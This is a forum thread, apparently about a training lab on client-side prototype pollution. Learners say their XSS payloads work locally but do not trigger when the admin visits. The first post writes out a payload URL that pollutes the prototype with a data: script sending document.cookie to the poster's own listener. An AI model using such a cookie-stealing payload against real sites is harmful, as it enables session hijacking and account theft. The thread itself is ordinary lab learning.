Whitebox Attacks - Prototype Pollution

I’m stuck on the the client-side prototype pollution challenge. I have the following payload that executed XSS on my end, but when I send the link, I receive no request to my HTTP server:

/profile.php?id=2&__proto__[src][]=data:,$.get("http://<tun0>/?".concat(document.cookie));//

Any help is appreciated.

Anybody managed to find a way to complete the lab? Similarly I am stuck with the admin triggering the exploit. I tried both GET and POST methods and with no-cors for the POST request. Still admin doesn’t trigger the exploit?

Anybody knows what may be the cause for that.

Thank you!

Hello everyone !

Same issue, prototype pollution + XSS works on local, I can grab my own cookies but when sended to admin nothing triggers…
Tried multiple payloads, fetching cookies on local, burp collab, etc…

Can I / We have a hint ? Are they protections to bypass ?

Thanks you !!